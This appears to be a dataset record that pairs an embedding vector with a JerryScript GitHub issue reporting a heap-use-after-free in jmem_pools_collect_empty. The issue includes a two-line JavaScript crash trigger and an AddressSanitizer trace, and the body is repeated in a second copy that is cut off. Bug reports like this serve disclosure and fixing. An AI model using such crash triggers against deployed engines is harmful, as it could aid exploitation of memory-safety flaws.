-0.0016418129671365023, 0.0011156979016959667, 0.02017609402537346, 0.0034573273733258247, 0.015766749158501625, -0.00840447936207056, -0.009333114139735699, 0.026549601927399635, 0.009139370173215866, 0.014056457206606865, 0.0027458195108920336, 0.0008000289089977741, 0.014190074056386948, 0.006183104123920202, 0.0135487150400877, 0.006467039231210947, -0.025159990414977074, 0.01700938306748867, -0.022634638473391533, -0.0075025674887001514, 0.009934388101100922, 0.023262634873390198, 0.009199497289955616, 0.005905849859118462, 0.002520341658964753, 0.02636253833770752, -0.013007568195462227, -0.002582139102742076, -0.009399921633303165, 0.006894612219184637, -0.026629772037267685, 0.020777368918061256, -0.004051920957863331, 0.018198570236563683, 0.00013935785682406276, 0.005090789403766394, 0.005715446546673775, -0.003717879531905055, 0.012105656787753105, -0.006837825290858746, -0.02592160366475582, -0.012559952214360237, -0.002620553830638528, 0.009433326311409473, -0.0017837805207818747, 0.00375796458683908, -0.015085305087268353, 0.003711198689416051, 0.014256882481276989, -0.021204940974712372, 0.006316720973700285, 0.015325814485549927, 0.028914613649249077, -0.003427263582125306, -0.007916778326034546, 0.0028627337887883186, 0.03890912979841232, -0.0052143847569823265, 0.022848423570394516, 0.0071952491998672485, 0.028540488332509995, -0.004643173888325691, 0.02375701628625393, 0.014550838619470596, -0.007415716536343098, 0.009593665599822998, -0.007963544689118862, -0.005097470246255398, -0.02192647010087967, 0.005668680649250746, -0.02192647010087967, 0.019828690215945244, -0.00866503082215786, -0.017543848603963852, -0.007221972569823265, 0.011170340701937675, 0.0009344805148430169, -0.011217106133699417, -0.0003355027292855084, -0.0034072212874889374, -0.00317339226603508, 0.011096851900219917, 0.009272986091673374, -0.0007369786035269499, -0.018171846866607666, -0.014938326552510262, 0.007843289524316788, 0.012392931617796421, -0.00043675900087691844, -0.019307587295770645, 0.0006067025242373347, 0.0002883193956222385, -0.01460428535938263, -0.006620698608458042, 0.013441821560263634, -0.01409654226154089, -0.006640740670263767, -0.01579347252845764, -0.008030353114008904, 0.017436955124139786, -0.0059693180955946445, -0.008551456965506077, 0.015766749158501625, -0.018786482512950897, -0.00003598773037083447, 0.0015808504540473223, -0.015499516390264034, 0.009941068477928638, 0.009406602941453457, 0.012192507274448872, 0.009713920764625072, -0.009159412235021591, -0.0045863869599998, 0.018612781539559364, -0.013575438410043716, -0.011437573470175266, -0.005364703014492989, 0.00005279418110148981, -0.0012518197763711214, -0.011330680921673775, 0.009540218859910965, -0.022434212267398834, 0.002052683848887682, 0.006854527164250612, -0.02673666551709175, -0.004419366363435984, -0.0067008682526648045, 0.018786482512950897, -0.021258387714624405, 0.00737563194707036, 0.007823247462511063, 0.009226220659911633, 0.02811291441321373, 0.022754892706871033, 0.0037011774256825447, 0.0015841908752918243, 0.003941687289625406, 0.01129059586673975, -0.025721179321408272, -0.024184590205550194, -0.007014866918325424, 0.02071055956184864, -0.007161845453083515, -0.000012050278201058973, -0.009419964626431465, 0.004422706551849842, -0.0031850836239755154, 0.012539910152554512, 0.003039775649085641, 0.014884879812598228, 0.030090440064668655, -0.003634369233623147, -0.020202817395329475, 0.017263254150748253, 0.014684455469250679, -0.015138750895857811, -0.009981153532862663, -0.01452411524951458, -0.0022848425433039665, -0.002592160366475582, 0.0032936471980065107, 0.023583315312862396, 0.014417221769690514, 0.012252634391188622, -0.013802586123347282, 0.01671542599797249, -0.011023363098502159, 0.003175062593072653, -0.002381714526563883, -0.008972348645329475, -0.015205559320747852, -0.01101000141352415, 0.01700938306748867, 0.02075064554810524, 0.015365899540483952, 0.008371074683964252, -0.023342804983258247, -0.002425139769911766, -0.01607406698167324, 0.0035007528495043516, -0.019133884459733963, 0.004065282642841339, 0.012573313899338245, -0.03217485547065735, -0.015606408938765526, 0.009159412235021591, 0.0008601563167758286, 0.025654371827840805, -0.0060461475513875484, -0.005802297033369541, 0.027003897354006767, 0.006186444777995348, -0.006994824856519699, 0.0008363559027202427, -0.0022447574883699417, -0.006573932711035013, 0.02140536531805992, 0.007803204469382763, 0.0009895972907543182, 0.009005753323435783, -0.0006964760832488537, 0.0027875746600329876, -0.00929970946162939, 0.00866503082215786, -0.020924346521496773, -0.021739406511187553, -0.007095037028193474, 0.0113707659766078, 0.018332185223698616, -0.007876693271100521, -0.005942594725638628, 0.009880941361188889, 0.0070816753432154655, -0.004095346201211214, 0.0038648578338325024, 0.0037279007956385612, 0.01745031774044037, -0.02208681032061577, 0.012219230644404888, 0.01263344194740057, -0.007449120748788118, -0.0015750046586617827, 0.00234496989287436, 0.014390498399734497, -0.031667113304138184, -0.0067008682526648045, -0.005237767472863197, -0.004242324270308018, 0.0002674418210517615, -0.0023533208295702934, 0.026135390624403954, 0.005986019968986511, -0.000035831148124998435, -0.0038648578338325024, -0.012686888687312603, 0.006099593825638294, 0.001887333346530795, -0.026496155187487602, 0.006714229937642813, 0.003006371669471264, 0.006149700377136469, 0.0020226200576871634, 0.02934218756854534, 0.0229820404201746, -0.0037312412168830633, 0.022794978693127632, 0.013535353355109692, -0.0003361290437169373, 0.03901602327823639, -0.003945027478039265, 0.0043759411200881, -0.010796214453876019, -0.022835062816739082, -0.0022330661304295063, 0.0050005982629954815, 0.041928861290216446, -0.003721219953149557, -0.0046264720149338245, 0.005611893720924854, -0.009166092611849308, 0.024932842701673508, -0.0033203703351318836, -0.012807142920792103, 0.020443327724933624, 0.016047343611717224, 0.014003011398017406, 0.008090480230748653, 0.010903107933700085, -0.04136767238378525, -0.002971297362819314, 0.005104151088744402, -0.012199187651276588, -0.0052978950552642345, -0.0012167453533038497, -0.03156021982431412, -0.02079072967171669, -0.0007570210727863014, -0.02180621586740017, 0.01080289576202631, 0.012793781235814095, -0.028086191043257713, 0.000007809519956936128, -0.01810503751039505, 0.00486364122480154, -0.005221065599471331, -0.012105656787753105, 0.007155164610594511, -0.006163062062114477, 0.013515310361981392, -0.012686888687312603, -0.00881200935691595, 0.005137555301189423, 0.019307587295770645, -0.006994824856519699, -0.00440266402438283, -0.01569993980228901, 0.003256902564316988, -0.017396871000528336, -0.002253108425065875, 0.021819576621055603, 0.0038347940426319838, -0.015405984595417976, -0.009293029084801674, -0.005050704348832369, -0.0039383466355502605, 0.026349177584052086, 0.003788028145208955, 0.003550858935341239, 0.016368024051189423, 0.004803513642400503, -0.012606718577444553, 0.02441173791885376, -0.004563004244118929, 0.023209188133478165, 0.024264760315418243, -0.005404788069427013, -0.0028610636945813894, 0.0019307587062940001, -0.023543231189250946, 0.0069681014865636826, 0.013882756233215332, 0.020937707275152206, 0.0019140566000714898, 0.02375701628625393, -0.0027775533962994814, -0.03177400678396225, -0.0061296578496694565, 0.004937130492180586, 0.01639474742114544, -0.01115029864013195, 0.005251129157841206, 0.017650742083787918, 0.0010196610819548368, -0.0135487150400877, 0.021338557824492455, 0.01452411524951458, 0.014377137646079063, -0.012820504605770111, 0.0028527125250548124, -0.004462791606783867, 0.01989549957215786, 0.004856960382312536, -0.005237767472863197, 0.03479374200105667, 0.010716044344007969, -0.00929970946162939, 0.011116893962025642, -0.0023917355574667454, 0.001541600562632084, -0.0007841619080863893, 0.004776790272444487, 0.015593047253787518, -0.00596263725310564, -0.012319442816078663, -0.00041922181844711304, -0.01826537773013115, -0.029555972665548325, 0.0026907026767730713, 0.022394128143787384, -0.005728808231651783, 0.0038180919364094734, -0.023690208792686462, -0.010361961089074612, 0.0022865126375108957, 0.002508650068193674, -0.013441821560263634, 0.012159102596342564, -0.006734272465109825, -0.0028543828520923853, 0.00659063458442688, -0.024545354768633842, -0.006420273799449205, -0.015552962198853493, 0.0023516507353633642, 0.013014248572289944, 0.009019115008413792, -0.01479134801775217, 0.014403860084712505, 0.0025253521744161844, -0.01397628802806139, 0.008484648540616035, 0.003216817742213607, -0.01253322884440422, -0.0013511970173567533, 0.010655917227268219, 0.007763119414448738, -0.024518631398677826, 0.0015858610859140754, 0.008297585882246494, -0.009426645003259182, 0.0028076169546693563, 0.000857651000842452, -0.010114770382642746, -0.006226529832929373, -0.00617308309301734, 0.009132688865065575, 0.013595480471849442, 0.01155782863497734, -0.0000022900096610101173, 0.01198540162295103, -0.015887003391981125, -0.011604594066739082, -0.0007824917556717992, -0.0034506465308368206, 0.00757605629041791, -0.0030347651336342096, 0.0012643462978303432, 0.011671402491629124, -0.015138750895857811, -0.0043959831818938255, -0.03698505088686943, -0.005945934914052486, 0.01769082620739937, 0.00760946050286293, 0.0006993989809416234, 0.003981772344559431, 0.0025988412089645863, 0.02218034118413925, 0.002268140437081456, -0.007449120748788118, 0.003001360921189189, 0.006163062062114477, 0.01086302287876606, 0.01623440720140934, -0.031186094507575035, -0.0010113100288435817, 0.015673218294978142, -0.00860490370541811, -0.027605172246694565, 0.013481906615197659, 0.014577561989426613, 0.027444832026958466, 0.007656226400285959, 0.023369528353214264, -0.013034291565418243, -0.004259026609361172, 0.005996040999889374, -0.013949564658105373, 0.0032452112063765526, -0.0014221807941794395, 0.01896018348634243, -0.011364084668457508, -0.01269356906414032, 0.011751572601497173, 0.01830546371638775, 0.0003039775765500963, -0.0087518822401762, -0.002952924929559231, -0.011998763307929039, -0.028139637783169746, 0.014577561989426613, 0.0019073757575824857, 0.008979029953479767, 0.009767367504537106, -0.00368781597353518, -0.005044023506343365, 0.010976596735417843, -0.01981532946228981, 0.03222830221056938, 0.002642266685143113, 0.006273295264691114, -0.020737282931804657, -0.014029733836650848, 0.005658659618347883, 0.016675341874361038, -0.003423923160880804, 0.012573313899338245, -0.0026856919284909964, 0.0049838959239423275, 0.016287853941321373, -0.011905231513082981, -0.0014205105835571885, -0.006109615322202444, 0.0035141143016517162, 0.01092314999550581, 0.0010522300144657493, 0.007048271130770445, -0.0001561643002787605, 0.013187950477004051, 0.016421470791101456, -0.00803703349083662, -0.017998144030570984, 0.022875146940350533, -0.003008041763678193, 0.007910097949206829, 0.01253322884440422, -0.017543848603963852, -0.007809885311871767, 0.001924077863804996, -0.020964430645108223, -0.013989649713039398, 0.013949564658105373, 0.012700250372290611, 0.004970534238964319, 0.0021044600289314985, 0.025093181058764458, -0.005254469346255064, 0.010261748917400837, 0.004138771444559097, 0.0018221952486783266, 0.005618574563413858, 0.010756129398941994, 0.005371383856981993, 0.007228653412312269, -0.0065037840977311134, -0.00005297686220728792, -0.0003755876678042114, -0.004950492177158594, -0.0005002268590033054, -0.012513186782598495, -0.01080289576202631, -0.006016083527356386, 0.017303338274359703, -0.011931954883038998, 0.019107161089777946, 0.003644390497356653, 0.0051308744587004185, -0.00817733071744442, -0.007849969901144505, 0.0037279007956385612, 0.024157866835594177, 0.011805019341409206, -0.018439078703522682, -0.007442439906299114, 0.0012042188318446279, -0.015673218294978142, 0.016902489587664604, -0.0015524568734690547, -0.009733962826430798, -0.00754933338612318, 0.00659063458442688, -0.005140895489603281, -0.002972967457026243, -0.007756438571959734, 0.010422088205814362, 0.013989649713039398, 0.014003011398017406, -0.017156360670924187, 0.001488989102654159, 0.017877889797091484, 0.01424352079629898, -0.011464296840131283, 0.00001564513695484493, 0.01635466143488884, 0.007034909445792437, 0.022674722597002983, 0.003355444874614477, 0.0005849897861480713, -0.01578010991215706, -0.0035976245999336243, -0.006837825290858746, 0.015232282690703869, 0.009326432831585407, 0.008832051418721676, 0.0010071344440802932, 0.022073447704315186, 0.010883064940571785, 0.007034909445792437, -0.0274982787668705, 0.0037045178469270468, -0.0034339444246143103, -0.00034844683250412345, 0.010041281580924988, -0.010956554673612118, -0.025854796171188354, 0.014537476934492588, 0.00511751277372241, 0.008057075552642345, 0.016915850341320038, 0.007388993166387081, -0.01680895872414112, 0.008558138273656368, -0.0008042044355534017, -0.009921026416122913, 0.016675341874361038, -0.012366208247840405, 0.001590036554262042, -0.00627663591876626, 0.008204054087400436, -0.01603398285806179, -0.010181578807532787, -0.00838443636894226, 0.04102027043700218, -0.013228035531938076, 0.003427263582125306, 0.02397080324590206, -0.027471555396914482, 0.018746396526694298, 0.011250510811805725, -0.025707818567752838, -0.007843289524316788, 0.013882756233215332, 0.030491288751363754, 0.010809576138854027, 0.008157288655638695, 0.019214054569602013, 0.006981463171541691, 0.034927356988191605, -0.006640740670263767, -0.011731530539691448, 0.002750830026343465, -0.008564818650484085, 0.035702332854270935, 0.009653793647885323, -0.01623440720140934, 0.004502876661717892, -0.006627379450947046, -0.01944120228290558, -0.0035207951441407204, -0.0043959831818938255, 0.012433016672730446, 0.04735369235277176, 0.008938944898545742, 0.007108398713171482, -0.023169104009866714, 0.030945586040616035, 0.0012985855573788285, -0.00029834063025191426, 0.017891252413392067, 0.0017704188358038664, 0.005832361057400703, 0.004509557504206896, 0.0019407798536121845, 0.004382621962577105, 0.006163062062114477, -0.00980745255947113, -0.002884446643292904, 0.0181852076202631, 0.004723343998193741, 0.01672878861427307, 0.0005453224293887615, 0.006791059393435717, -0.02212689444422722, -0.01847916468977928, 0.013428459875285625, 0.0033921892754733562, -0.0005298730102367699, -0.008297585882246494, -0.024545354768633842, 0.004569685086607933, -0.019187331199645996, -0.004061941988766193, -0.0034539869520813227, -0.0013996330089867115, -0.015392622910439968, -0.018332185223698616, -0.020336434245109558, -0.00823745783418417, 0.00292954221367836, 0.0015248984564095736, 0.0029896695632487535, -0.04529599845409393, 0.0016743820160627365, 0.010442131198942661, 0.008624945767223835, 0.014230159111320972, 0.012025486677885056, -0.004175516311079264, -0.021619152277708054, -0.04770109802484512, -0.013882756233215332, 0.0038615174125880003, 0.0266564954072237, -0.002174608875066042, 0.009266305714845657, -0.011711487546563148, -0.011457616463303566, -0.0016835681162774563, -0.0006446996703743935, 0.012726972810924053, -0.00031775678507983685, 0.016782235354185104, -0.018091676756739616, 0.005174299702048302, -0.013154545798897743, 0.023302720859646797, -0.014911603182554245, 0.006306699477136135, 0.008798647671937943, 0.01611415110528469, 0.009814132936298847, 0.010108089074492455, 0.02116485685110092, -0.00935983657836914, -0.001092315069399774, 0.003348764032125473, 0.00626661442220211, 0.012299400754272938, 0.0007632843335159123, 0.00009561931801727042, 0.01460428535938263, 0.0006154711009003222, -0.007201930042356253, 0.02212689444422722, 0.002465224824845791, -0.007141802925616503, 0.02566773258149624, -0.01070268265902996, 0.004750067368149757, -0.015486154705286026, 0.008651669137179852, 0.007282100152224302, -0.008918902836740017, -0.012272677384316921, 0.014911603182554245, 0.01255327183753252, 0.014417221769690514, 0.006269955076277256, -0.0024368311278522015, -0.005348001141101122, -0.00782992783933878, 0.007208610884845257, 0.002884446643292904, 0.0033504341263324022, -0.0013912819558754563, -0.02920857071876526, -0.00751592917367816, 0.0040018148720264435, 0.006072870921343565, 0.009647112339735031, -0.006760995835065842, 0.01830546371638775, 0.010822937823832035, 0.007729715667665005, 0.018158484250307083, 0.0014096542727202177, -0.025173351168632507, 0.014711178839206696, -0.01346854493021965, -0.013194630853831768, 0.029689589515328407, -0.010221663862466812, 0.01716972328722477, 0.01684904284775257, 0.0014990102499723434, 0.016608532518148422, 0.0010179908713325858, 0.014417221769690514, 0.01619432121515274, 0.0020777368918061256, 0.03148005157709122, -0.024344928562641144, 0.013294843025505543, -0.012967483140528202, -0.004092006012797356, 0.04639165475964546, -0.0027391386684030294, 0.02510654367506504, -0.01106344722211361, -0.010368641465902328, -0.00972060114145279, -0.008170650340616703, 0.0005883302073925734, 0.004519578535109758, 0.00852473359555006, -0.0038180919364094734, 0.011337361298501492, -0.01149770151823759, -0.012192507274448872, -0.015138750895857811, 0.013789224438369274, 0.012466421350836754, 0.013274800963699818, 0.0069146547466516495, -0.026790112257003784, -0.011992081999778748, 0.002575458260253072, -0.007021547760814428, -0.016661979258060455, -0.010281790979206562, -0.00923290103673935, 0.0019073757575824857, -0.002086087828502059, -0.0018940140726044774, 0.012486463412642479, 0.04935793951153755, -0.008264181204140186, 0.009132688865065575, 0.002383384620770812, -0.003888240549713373, 0.017396871000528336, 0.01177829597145319, 0.015713302418589592, -0.009333114139735699, 0.00501395994797349, 0.003801389830186963, 0.0044594514183700085, 0.00267567066475749, 0.0027307874988764524, -0.0012760377721861005, -0.0017837805207818747, 0.005064066033810377, 0.009546900168061256, 0.01655508577823639, -0.016822319477796555, 0.017343424260616302, 0.006674144882708788, 0.0018155144061893225, -0.008925583213567734, 0.0006330082542262971, -0.0013704043813049793, -0.005451553966850042, -0.02128511108458042, -0.006042806897312403, -0.01049557700753212, -0.004028537776321173, -0.010682640597224236, 0.0013896117452532053, 0.0036544117610901594, -0.016287853941321373, -0.0075025674887001514, -0.005341320298612118, -0.010074685327708721, 0.016688702628016472, -0.0075560142286121845, -0.02385054901242256, -0.016541725024580956, 0.013922841288149357, 0.013034291565418243, 0.007054951973259449, -0.01381594780832529, -0.0055718086659908295, -0.008030353114008904, 0.0029996908269822598, -0.011197064071893692, 0.020764006301760674, -0.002096109092235565, 0.012092295102775097, 0.005217724945396185, 0.0051308744587004185, -0.02554747834801674, 0.004292430821806192, -0.008070437237620354, 0.018091676756739616, 0.014283605851233006, -0.009186135604977608, 0.001026341924443841, -0.0029579356778413057, -0.020924346521496773, 0.003908283077180386, -0.0015591377159580588, -0.008905541151762009, -0.018252016976475716, 0.007522610016167164, 0.01770418882369995, 0.006894612219184637, 0.013054333627223969, -0.004950492177158594, 0.0013436811277642846, 0.008063756860792637, -0.013294843025505543, 0.017436955124139786, -0.0014881539391353726, -0.012152422219514847, -0.005705425050109625, -0.005077427718788385, 0.01374913938343525, -0.006256593391299248, -0.0017887911526486278, -0.003427263582125306, -0.010001196525990963, 0.0043291752226650715, 0.026750026270747185, 0.012519868090748787, -0.004058601800352335, 0.005337979644536972, -0.004145452287048101, 0.005418149754405022, 0.007188568823039532, 0.021512258797883987, -0.0031483392231166363, 0.002847702009603381, 0.009640431962907314, 0.01728997752070427, -0.004208920057862997, 0.0038314536213874817, -0.011851784773170948, 0.008965668268501759, 0.014136627316474915, 0.015112028457224369, 0.02152562141418457, 0.0017186424229294062, 0.005264490842819214, 0.026910366490483284, 0.016982659697532654, 0.012626760639250278, 0.01101000141352415, -0.010388684459030628, 0.015726663172245026, -0.005311256740242243, 0.012940759770572186, -0.010268429294228554, -0.0024835970252752304, -0.0015808504540473223, -0.03300327807664871, 0.0005716281593777239, 0.010442131198942661, -0.002132853725925088, -0.016408108174800873, -0.01318126916885376, 0.013602161779999733, 0.012760377489030361, -0.003253562143072486, 0.03241536766290665, 0.006440316326916218, -0.010141493752598763, 0.013047653250396252, 0.006390209775418043, 0.013067695312201977, 0.008397798053920269, -0.00016921279893722385, -0.0001313199900323525, -0.015673218294978142, 0.007382312323898077, 0.01932094804942608, 0.006303359288722277, -0.012606718577444553, 0.016047343611717224, -0.009373198263347149, 0.019908860325813293, 0.011611275374889374, 0.014377137646079063, -0.013802586123347282, 0.015339176170527935, -0.005047363694757223, -0.004249005112797022, 0.0009127678349614143, 0.02059030532836914, 0.0008058746461756527, 0.032201580703258514, 0.001530744251795113, -0.00978740956634283, 0.02025626413524151, 0.015539600513875484, -0.00592923304066062, 0.01830546371638775, 0.004522919189184904, -0.0029462440870702267, -0.0034439656883478165, -0.00743575906381011, 0.005705425050109625, 0.009566942229866982, 0.013909479603171349, 0.018692949786782265, 0.02558756247162819, 0.019588181748986244, 0.003791368566453457, 0.008003629744052887, 0.008651669137179852 ]
176
null
null
null
null
null
null
null
null
null
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` var arr = new Int32Array(0); arr.reduceRight(Math.asinh, 0.00001); ``` ###### Output ``` ================================================================= ==11298==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5d00650 at pc 0x566dfe24 bp 0xff8a9ca8 sp 0xff8a9c98 READ of size 4 at 0xf5d00650 thread T0 #0 0x566dfe23 in jmem_pools_collect_empty /root/jerryscript/jerry-core/jmem/jmem-poolman.c:165 #1 0x566df9b0 in jmem_pools_finalize /root/jerryscript/jerry-core/jmem/jmem-poolman.c:44 #2 0x566def76 in jmem_finalize /root/jerryscript/jerry-core/jmem/jmem-allocator.c:161 #3 0x56789dc0 in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:272 #4 0x56784a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #5 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #6 0x566243d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) 0xf5d00650 is located 0 bytes inside of 8-byte region [0xf5d00650,0xf5d00658) freed by thread T0 here: #0 0xf7a49b94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94) #1 0x566df5d4 in jmem_heap_free_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:478 #2 0x566dfe38 in jmem_pools_collect_empty /root/jerryscript/jerry-core/jmem/jmem-poolman.c:168 #3 0x566df9b0 in jmem_pools_finalize /root/jerryscript/jerry-core/jmem/jmem-poolman.c:44 #4 0x566def76 in jmem_finalize /root/jerryscript/jerry-core/jmem/jmem-allocator.c:161 #5 0x56789dc0 in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:272 #6 0x56784a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #7 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) previously allocated by thread T0 here: #0 0xf7a49f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54) #1 0x566df28c in jmem_heap_alloc /root/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x566df36a in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:291 #3 0x566df3da in jmem_heap_alloc_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:310 #4 0x566dfb31 in jmem_pools_alloc /root/jerryscript/jerry-core/jmem/jmem-poolman.c:85 #5 0x566ddafa in ecma_alloc_number /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:57 #6 0x567b7c4b in ecma_create_float_number.lto_priv.938 /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:515 #7 0x567b9080 in ecma_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:891 #8 0x567b93ea in ecma_fast_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:944 #9 0x566c4da6 in vm_loop /root/jerryscript/jerry-core/vm/vm.c:1115 #10 0x566dd48a in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953 #11 0x566ddad3 in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #12 0x566c1ef5 in vm_run_global /root/jerryscript/jerry-core/vm/vm.c:350 #13 0x5678a7a9 in jerry_run /root/jerryscript/jerry-core/api/jerry.c:608 #14 0x5678398c in main /root/jerryscript/jerry-main/main-unix.c:123 #15 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) SUMMARY: AddressSanitizer: heap-use-after-free /root/jerryscript/jerry-core/jmem/jmem-poolman.c:165 in jmem_pools_collect_empty Shadow bytes around the buggy address: 0x3eba0070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba0080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3eba00c0: fa fa fa fa fa fa fa fa fa fa[fd]fa fa fa fd fd 0x3eba00d0: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa fd fd 0x3eba00e0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd 0x3eba00f0: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa 0x3eba0100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba0110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==11298==ABORTING ``` Credits: Found by chong from OWL337.
heap-use-after-free in jmem_pools_collect_empty
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4400/comments
1
2021-01-02T14:23:31
2021-01-05T19:58:14Z
https://github.com/jerryscript-project/jerryscript/issues/4400
777,468,289
4,400
false
This is a GitHub Issue repo:jerryscript owner:jerryscript-project Title : heap-use-after-free in jmem_pools_collect_empty Issue date: --- start body --- ###### JerryScript revision 2faafa4 ###### Build platform Ubuntu 18.04.5 LTS(Linux 4.15.0-119-generic x86_64) ###### Build steps ``` ./tools/build.py --clean --debug --compile-flag=-fsanitize=address \ --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \ --compile-flag=-fno-common --compile-flag=-g --strip=off \ --system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \ --error-messages=on --profile=es2015-subset --builddir=$PWD/build ``` ###### Test case ``` var arr = new Int32Array(0); arr.reduceRight(Math.asinh, 0.00001); ``` ###### Output ``` ================================================================= ==11298==ERROR: AddressSanitizer: heap-use-after-free on address 0xf5d00650 at pc 0x566dfe24 bp 0xff8a9ca8 sp 0xff8a9c98 READ of size 4 at 0xf5d00650 thread T0 #0 0x566dfe23 in jmem_pools_collect_empty /root/jerryscript/jerry-core/jmem/jmem-poolman.c:165 #1 0x566df9b0 in jmem_pools_finalize /root/jerryscript/jerry-core/jmem/jmem-poolman.c:44 #2 0x566def76 in jmem_finalize /root/jerryscript/jerry-core/jmem/jmem-allocator.c:161 #3 0x56789dc0 in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:272 #4 0x56784a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #5 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) #6 0x566243d0 (/root/jerryscript/build/bin/jerry+0x1d3d0) 0xf5d00650 is located 0 bytes inside of 8-byte region [0xf5d00650,0xf5d00658) freed by thread T0 here: #0 0xf7a49b94 in __interceptor_free (/usr/lib32/libasan.so.4+0xe5b94) #1 0x566df5d4 in jmem_heap_free_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:478 #2 0x566dfe38 in jmem_pools_collect_empty /root/jerryscript/jerry-core/jmem/jmem-poolman.c:168 #3 0x566df9b0 in jmem_pools_finalize /root/jerryscript/jerry-core/jmem/jmem-poolman.c:44 #4 0x566def76 in jmem_finalize /root/jerryscript/jerry-core/jmem/jmem-allocator.c:161 #5 0x56789dc0 in jerry_cleanup /root/jerryscript/jerry-core/api/jerry.c:272 #6 0x56784a9c in main /root/jerryscript/jerry-main/main-unix.c:324 #7 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) previously allocated by thread T0 here: #0 0xf7a49f54 in malloc (/usr/lib32/libasan.so.4+0xe5f54) #1 0x566df28c in jmem_heap_alloc /root/jerryscript/jerry-core/jmem/jmem-heap.c:254 #2 0x566df36a in jmem_heap_gc_and_alloc_block /root/jerryscript/jerry-core/jmem/jmem-heap.c:291 #3 0x566df3da in jmem_heap_alloc_block_internal /root/jerryscript/jerry-core/jmem/jmem-heap.c:310 #4 0x566dfb31 in jmem_pools_alloc /root/jerryscript/jerry-core/jmem/jmem-poolman.c:85 #5 0x566ddafa in ecma_alloc_number /root/jerryscript/jerry-core/ecma/base/ecma-alloc.c:57 #6 0x567b7c4b in ecma_create_float_number.lto_priv.938 /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:515 #7 0x567b9080 in ecma_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:891 #8 0x567b93ea in ecma_fast_copy_value /root/jerryscript/jerry-core/ecma/base/ecma-helpers-value.c:944 #9 0x566c4da6 in vm_loop /root/jerryscript/jerry-core/vm/vm.c:1115 #10 0x566dd48a in vm_execute /root/jerryscript/jerry-core/vm/vm.c:4953 #11 0x566ddad3 in vm_run /root/jerryscript/jerry-core/vm/vm.c:5060 #12 0x566c1ef5 in vm_run_global /root/jerryscript/jerry-core/vm/vm.c:350 #13 0x5678a7a9 in jerry_run /root/jerryscript/jerry-core/api/jerry.c:608 #14 0x5678398c in main /root/jerryscript/jerry-main/main-unix.c:123 #15 0xf7785f20 in __libc_start_main (/lib32/libc.so.6+0x18f20) SUMMARY: AddressSanitizer: heap-use-after-free /root/jerryscript/jerry-core/jmem/jmem-poolman.c:165 in jmem_pools_collect_empty Shadow bytes around the buggy address: 0x3eba0070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba0080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba0090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba00a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x3eba00b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x3eba00c0: fa fa fa fa fa fa fa fa fa fa[fd]fa fa fa fd fd 0x3eba00d0: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa fd fd 0x3eba00e0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd 0x3eba00f0: fa fa fd fd fa fa 00 00 fa fa fa fa fa fa fa fa 0x3eba0100: fa fa fa fa fa fa fa fa fa fa fa fa 